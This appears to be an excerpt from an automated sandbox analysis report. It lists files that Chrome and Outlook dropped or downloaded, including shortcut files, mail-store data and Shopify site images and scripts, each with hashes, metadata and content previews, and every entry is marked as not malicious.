                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:..............................
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Mar 28 13:20:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2675
                                                                    Entropy (8bit):3.9738582605619155
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:A0CCBE2BCEFDA93B475E3B6540586E10
                                                                    SHA1:B259F4EAEADB1CF2A75F86BEC034097347B16FEC
                                                                    SHA-256:A739F6685CFF49DFAACF2B62717117258B1DFB4E5B4B0FC48D9E7CFADFD63A04
                                                                    SHA-512:B25C7E82688E61059475EFDE7A98EBBE75F42C80ED1A2538E37049484E76FD11B050FA4A75C7A9A640E0917130908CE0AB0D2D78CD5E42A7C995100B9CE448FC
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:L..................F.@.. ...$+.,.....+n.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I|Xrr....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V|X.r....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V|X.r....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V|X.r...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V|X.r.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........:P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Mar 28 13:20:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2677
                                                                    Entropy (8bit):3.992030470117034
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:07612CA81D4909C92E13009A6C95B7CD
                                                                    SHA1:8181C3F9C0C054DE674606C18AE5B1C5AA59302C
                                                                    SHA-256:F541531AC9B8C54081CBA75E7D1F5F9F35EA6B1766AC8E67DF5BB4A7A849804C
                                                                    SHA-512:64AC1F2C81A12FF11C9722CCFA2BAB4FCAB0695F4948D423C0B4499C8986184489F13E5F831529E54BD5A9CA30E6AD28267170AFE63CB3B27DE828F7B66B4251
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:L..................F.@.. ...$+.,....zkb.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I|Xrr....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V|X.r....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V|X.r....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V|X.r...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V|X.r.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........:P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2691
                                                                    Entropy (8bit):3.999315737899543
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:2BE3FF5963369612D9B99A3E8331F890
                                                                    SHA1:4B08D54F203A6080C67CF1BFF580BEEA3FFDCE25
                                                                    SHA-256:F6D2D5AB9E736B26A910B4343B2F874493FF1E8A805779477C24A506913B6034
                                                                    SHA-512:53CB6919F8F10BFA72EAF5CEC3C3EBA1287E58B327DFE82C10EA16EF295DB8D87586A19E5D22ED2D3D75AD279B446B934F40751F093111FC7BF102FD1C4DF17E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I|Xrr....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V|X.r....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V|X.r....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V|X.r...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........:P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Mar 28 13:20:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2679
                                                                    Entropy (8bit):3.9921367381189237
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:8B98DB4C54501214EDEBA053070F7321
                                                                    SHA1:B339991D995D6DA1773723162AE127C3A4CF14F4
                                                                    SHA-256:5C446EB8B6B1732BB62E04052B5C720D99884E6E0C6B3473639FC00C0CD9665E
                                                                    SHA-512:F2F706009FA42740895F180785C1CC64B92AEFDBDB7E8D6AA47467C589B24C7A4551CC2F6411705B7F814A99F2494580F23E8AF330EB3FE167EE82D7DA3B55B0
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:L..................F.@.. ...$+.,.....Y.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I|Xrr....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V|X.r....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V|X.r....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V|X.r...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V|X.r.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........:P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Mar 28 13:20:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2679
                                                                    Entropy (8bit):3.976759685471437
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:F24A86C1FE685B93C2843DF650DEF74B
                                                                    SHA1:C48B874FE9684F79E63B04BC6A021FCEDC8F0EBD
                                                                    SHA-256:BC0E8C58EB787961A953DD169DCC6C57D86B652E79379380341A35C3313E4B1B
                                                                    SHA-512:6BC7470C2F92EA0404F191CE5CC010121C86E97A603D40D1E5CAC9C94C7E27A4A461512C2AA5C23487C2D63B4FD99A9A8F9FAFC71109039E63E917E6A1465CA8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:L..................F.@.. ...$+.,......h.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I|Xrr....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V|X.r....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V|X.r....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V|X.r...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V|X.r.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........:P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Mar 28 13:20:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2681
                                                                    Entropy (8bit):3.9916957754609856
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:09015EE2D6CAC9E7E9E9F9F5C9E49BBC
                                                                    SHA1:086F29EC14CC2BDF24986974B87D395F7C238799
                                                                    SHA-256:E67460EEA1300C1C9FBE9C652E26E8ABA1704764255865AAC3A9FACE6BD71629
                                                                    SHA-512:B9907AD1852E242819CDC4E1A245CABE952EA6F207C0C7C1A4B6998C0CF531EF03F36EC672C46B9A304F768B8E9F05125FCF6680B498DEAFF818EA5443325E39
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:L..................F.@.. ...$+.,....H.K.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I|Xrr....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V|X.r....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V|X.r....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V|X.r...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V|X.r.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........:P.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:Microsoft Outlook email folder (>=2003)
                                                                    Category:dropped
                                                                    Size (bytes):271360
                                                                    Entropy (8bit):1.1712817229552286
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:9ED77662A5D19F3A22EE7791E69CB2B0
                                                                    SHA1:E06D188B67E7F2D0D5547BACBF7A9ECF6B46DEAF
                                                                    SHA-256:69C3B45DF69BA237915585B799743710B56248CA958A8341D0915A21C489CC3F
                                                                    SHA-512:DA55DFD14A60147AE98341FC2667E8CCC89C7FA2DAAC3F8DD6B6BB2BE440F40C2E38CD342B844DA8EBA571E22E55012E3BD72319731DDE89E809AFD86953F65A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:!BDNd..(SM......\...............?.......U................@...........@...@...................................@...........................................................................$.......D......@Q..............;...............>.......................................................................................................................................................................................................................................................................................................U......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):131072
                                                                    Entropy (8bit):1.8056394296908262
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:211538E9FFD5186718068A97B6CC2AE0
                                                                    SHA1:B6755DA2D6844EFEF722C2E194B57A8D66BA50CD
                                                                    SHA-256:36B6DC43083DF5CEC84707969FB814204F02D104D87FDD3139D96371CF725477
                                                                    SHA-512:783FF0D47125DBA7C99B66E330A0660B270DC4FCA8DE64D4C413813937F57BF82DC9F0B4F3428F0B0C908C0341F306E1D3653A226DDD5B9C1F7F33E9A07FFB27
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:$ {.C...B............~........................#.!BDNd..(SM......\...............?.......U................@...........@...@...................................@...........................................................................$.......D......@Q..............;...............>.......................................................................................................................................................................................................................................................................................................U...~...........B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):1222
                                                                    Entropy (8bit):5.329424146514571
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:DE31EF32FB09A2D9F77119FD110EA6C6
                                                                    SHA1:F17079B745980F86516FE65D301CFD6C6E649E01
                                                                    SHA-256:FFC71BA9D34DD6220B56CD5F0FCF8B33B7E14668807E3BAC69CFB384F1671DEC
                                                                    SHA-512:B0BA45B0740C5A9786F328DC9229E73DC27A9E230D675D05EE0DD70D656DB2FB50AD75E4A5C914C3999013ABB9381DA4BD6FDBE3AA7CC01C62F5397CDCFDC1C8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/de31ef32fb09a2d9f77119fd110ea6c6.svgz
                                                                    Preview:<svg width="119" height="63" viewBox="0 0 119 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="118" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1309_6229)"/>.<g clip-path="url(#clip0_1309_6229)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M37 15L69.801 20.5464L56.4505 40.9921H55.3148L53.455 42.8351L51.4973 40.9921H50.9776L49.0898 42.866L47.2162 40.9921H46.5821L44.7047 42.8691L42.7693 40.9921H37L44.6202 43.9576L46.6704 42.9839L47.821 45.2113L48.3964 45.432L50.7481 44.271L51.9813 46.8632L52.4678 47.0266L50.7421 49.7121L82.4133 15.0003H37V15Z" fill="black"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M42.3916 22.8773L55.7465 26.0437L50.0033 26.6733L42.3916 22.877V22.8773Z" fill="black"/>.</g>.<defs>.<radialGradient id="paint0_radial_1309_6229" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(113.5 101.5) rotate(-123.956) scale(149.493 282.376)">.<stop stop-color="#4BFE85"/>.<stop offset="0.5781
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (10700)
                                                                    Category:downloaded
                                                                    Size (bytes):10701
                                                                    Entropy (8bit):4.4208050434113835
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:2F105F2BC6D9621FD5F986E327B974B6
                                                                    SHA1:8C9F9AA21B7B4D47B51DA455694E907F62108667
                                                                    SHA-256:871EA60E745A8A31E95056F472A24DF2879EAFA1B6594F3EDBE5D45EC74F8161
                                                                    SHA-512:52DBF10676007831524835DFB1B1041A84A6E81072F9EEF4F5A4B65482795D15A83C09B7DC4DE0AED468F4123AAD91BD6EC19C441CA52DCC025854A36C5C8A41
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-RMCHIY3Z.js
                                                                    Preview:import{a as p,b as H,d as e}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-R6P7ABP7.js";import{G as l,T as i}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";import{a as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as a}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var C=a(t());function r({className:o}){return(0,C.jsxs)("svg",{viewBox:"0 0 200 32",fill:"none",xmlns:"http://www.w3.org/2000/svg",className:o,children:[(0,C.jsx)("path",{d:"M117.923 31.189H116.694L119.399 17.2375C119.699 15.6754 119.918 14.221 120.109 12.9282H121.284L120.847 15.7023H120.902C122.158 13.79 123.989 12.6319 125.929 12.6319C128.77 12.6319 129.863 14.9482 129.863 17.1567C129.863 21.7354 126.366 26.1524 122.131 26.1524C120.519 26.1524 119.59 25.8292 119.044 25.533H118.989L117.923 31.189ZM120.027 20.2271L119.262 24.321C119.918 24.8327
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (810)
                                                                    Category:downloaded
                                                                    Size (bytes):811
                                                                    Entropy (8bit):5.220199330116193
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:6526A59EE4F57C8FB72F30F8D10B84AA
                                                                    SHA1:8C147F41E00AC9EC693C7652D994F3AD5EBB56C2
                                                                    SHA-256:A4DA596F565AA23E96CF4994DD6580EFA996F67D3BBF22B9983093D227754A93
                                                                    SHA-512:48B24D4745700523A700D8D58B3BB1740B062CE7EF7A7CECB76E964E68796EB1059C50198823E846FDF63A9A341BE33C1BCA4BDE252F4CAE4D561C729B71CE6A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-WSI62RAK.js
                                                                    Preview:import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as i}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var t=i(r()),m=e=>{if(e.srcSet&&typeof e.srcSet!="string")return console.error(`shared/Image component srcSet prop must be of type "string": ${e.srcSet}`),null;let s=e.srcSet&&e.srcSet.includes("@artdirection"),[S,,c]=e.srcSet&&e.srcSet.includes("1x")?e.srcSet.split(" "):[e.srcSet,"",e.srcSet];return s?(0,t.jsxs)("picture",{children:[(0,t.jsx)("source",{media:"(max-width: 899px)",srcSet:S}),(0,t.jsx)("source",{media:"(min-width: 900px)",srcSet:c}),(0,t.jsx)("img",{...e,src:c,alt:e.alt??""})]}):(0,t.jsx)("img",{...e,alt:e.alt??"",sizes:e.sizes??"100vw",srcSet:e.srcSet})},n=m;export{n as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):4930
                                                                    Entropy (8bit):4.546211885303909
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:B19E0C0D8F45827AFD3A9B73F8A145A0
                                                                    SHA1:98965B104CD85582F3483587B88DE369DDD3CC48
                                                                    SHA-256:AAF2F35C4DA4284A8A341D46EF31F3AF9D0C52CF8CB062EA48C057C6CD56161D
                                                                    SHA-512:DDED2A0ACDC56B8891D94EC38758283062CAA9FC2E80E4C982705DFDF288BA19B8B8A97C4061BE72243FEC99D92D5BFBCADFCE6681496B91DAD8E296184C2909
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="160" height="65" viewBox="0 0 160 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="158" height="63" rx="7.79" fill="white"/>.<g clip-path="url(#clip0_1918_7560)">.<path d="M126.341 33.6189H122.967V24.1435H126.341V21.4146H122.93C122.217 21.417 121.534 21.7014 121.03 22.2057C120.525 22.7101 120.241 23.3934 120.238 24.1067V33.6557C120.242 34.3686 120.527 35.0512 121.031 35.5553C121.535 36.0594 122.217 36.3442 122.93 36.3478H126.341V33.6189Z" fill="black"/>.<path d="M129.07 24.1435H132.443V33.6189H129.07V36.3478H132.475C133.189 36.3454 133.872 36.061 134.377 35.5566C134.881 35.0523 135.165 34.3689 135.167 33.6557V24.1067C135.164 23.3938 134.879 22.7112 134.375 22.2071C133.871 21.703 133.188 21.4182 132.475 21.4146H129.07V24.1435Z" fill="black"/>.<path d="M27.7495 41.7969C23.6905 41.7969 20.6855 39.6616 20.1885 36.2239H24.3302C24.8871 37.6045 26.5299 38.0647 27.7402 38.0647C29.3786 38.0647 30.621 37.5677 30.621 36.6381C30.621 35.7085 30.0596 35.368 27
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):12783
                                                                    Entropy (8bit):4.208141213603071
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D6B0F1BF898EB9C237BE5736EDCF5C81
                                                                    SHA1:DA844175DE4EFFFC384F2463A38AC97DB4FEDF6F
                                                                    SHA-256:765BC101C858EE335D219FAD9B0A22DFA254CFB442630961FCDE9B23B737C77A
                                                                    SHA-512:495347DA39F329252F90CAA24C41F35ADA7C0D727DD6573DCAF582F6300EA0B3E2C647957F749CEA1021C83AFD8AB743DD107A065E7805549C7E699C2D64F431
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/d6b0f1bf898eb9c237be5736edcf5c81.svgz
                                                                    Preview:<svg width="128" height="65" viewBox="0 0 128 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="126" height="63" rx="7.79" fill="white"/>.<g clip-path="url(#clip0_1549_7167)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M23.4863 34.6568C23.6577 34.7425 23.572 35.6854 23.572 36.8854C23.572 38.0854 23.572 39.7997 25.0291 39.6282C25.6291 39.5425 26.0577 38.5997 26.1434 37.8282C26.4863 35.6854 26.2291 33.1997 26.2291 30.4568C26.2291 28.6568 26.1434 27.0282 26.1434 24.9711C26.1434 24.114 25.972 23.2568 26.4863 23.0854C27.0006 22.9997 28.6291 23.0854 28.8006 23.2568C29.2291 23.5997 29.0577 25.6568 29.0577 26.8568C29.0577 30.5425 29.2291 34.7425 28.972 38.2568C28.8006 40.914 27.9434 43.5711 24.6006 43.2282C22.6291 42.9711 21.3434 41.8568 21.0006 40.0568C20.7434 38.9425 20.8291 37.7425 20.8291 36.5425C20.8291 35.8568 20.8291 34.6568 21.0863 34.3997C21.6006 34.1425 23.0577 34.4854 23.4863 34.6568Z" fill="#080808"/>.<path fill-rule="evenodd" clip-rule="evenodd" d=
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1376)
                                                                    Category:downloaded
                                                                    Size (bytes):1377
                                                                    Entropy (8bit):5.3342700861498304
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C8C38E975105E36AECDA32AB49124DD2
                                                                    SHA1:01C57D27C48DBA5240F1B4061AA3F3E270CC924C
                                                                    SHA-256:58AF256F2F5B11389E00F005E2FAB19BBDBC27DD70516D5D424717F04A406436
                                                                    SHA-512:7243448B269D3399664047DCC190452E0788643125D369DFE5AB8BF4B6A47C3A22243BF6932BD3E1EA469B730B3B31CA21633535B917B5C6FB49645BB042CDA8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-ER2J4DIE.js
                                                                    Preview:import{a as p}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-MIDNVE63.js";import{a as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-EFDWHHH7.js";import{a as m}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HDOSTYFD.js";import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-CAV6JYD5.js";import{h as l}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-PD2NQNQL.js";import{a as n}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{a as g}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var u=t(g());var a=t(n()),c=e=>{let o=l.exec(e),d=o&&o.length&&o[1]||"";return{isMatch:Boolean(o),matchResult:o,videoId:d}};function h({modalSiz
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (1287)
                                                                    Category:downloaded
                                                                    Size (bytes):1288
                                                                    Entropy (8bit):5.526275085160274
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:BC5697A1686364C364B460CD02497D97
                                                                    SHA1:8C397B2DDC7164824E0D3E2EC3CE7EE047A7B886
                                                                    SHA-256:3407D521ECA5B6E59F9BC2AA4E2CE8AFCF2CC1A7CC20260AF85349571E0EBB97
                                                                    SHA-512:2A5ADFE984397A07B0BE8C873601BB22FEA8007B541AB05CBE1CA815AAC9339D889333BDE5C2150BA58F42CF0C47767BB6394C304A0D11293C16EAA91D18D5E7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TJ5CAOJ6.js
                                                                    Preview:function c(r){let t=(r||"").replace(/[-_\s.]+(.)?/g,(e,n)=>n?n.toUpperCase():"");return t.substring(0,1).toLowerCase()+t.substring(1)}function u(r){let t={amp:"&",apos:"'","#x27":"'","#x2F":"/","#39":"'","#47":"/",lt:"<",gt:">",nbsp:" ",quot:'"'};return r.replace(/&([^;]+);/g,(e,n)=>t.hasOwnProperty(n)?t[n]:e)}function p(r){return r.replace(/\.?([A-Z]+)/g,(t,e)=>"_"+e.toLowerCase()).replace(/-/g,"_").replace(/\s/g,"_").replace(/^_/,"")}function a(r,...t){let e=r;return t.forEach(n=>{e=e.replace(/{[^}]+}/,String(n))}),u(e)}function g(r){let t="[\u3040-\u30FF\u3400-\u4DBF\u4E00-\u9FFF\uF900-\uFAFF\uFF66-\uFF9F]",e=r.match(new RegExp(`[A-Z]{2,}(?=[A-Z][a-z]+[0-9]*|\b)|[A-Z]?[a-z]+[0-9]*|[A-Z]|[0-9]+|${t}+`,"gu"));return e?e.map(n=>n.toLowerCase()).join("-"):""}function l(r){let t=new RegExp(`(?:^|; )${r}=([^;]*)(?:$|; )`),e=document.cookie.match(t);return e?decodeURIComponent(e[1]):""}function f(r){let t=r.split(",").map(o=>o.trim()),e=null,n=null;return t.forEach(o=>{let[s,i]=o.split(" "
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:RIFF (little-endian) data, Web/P image
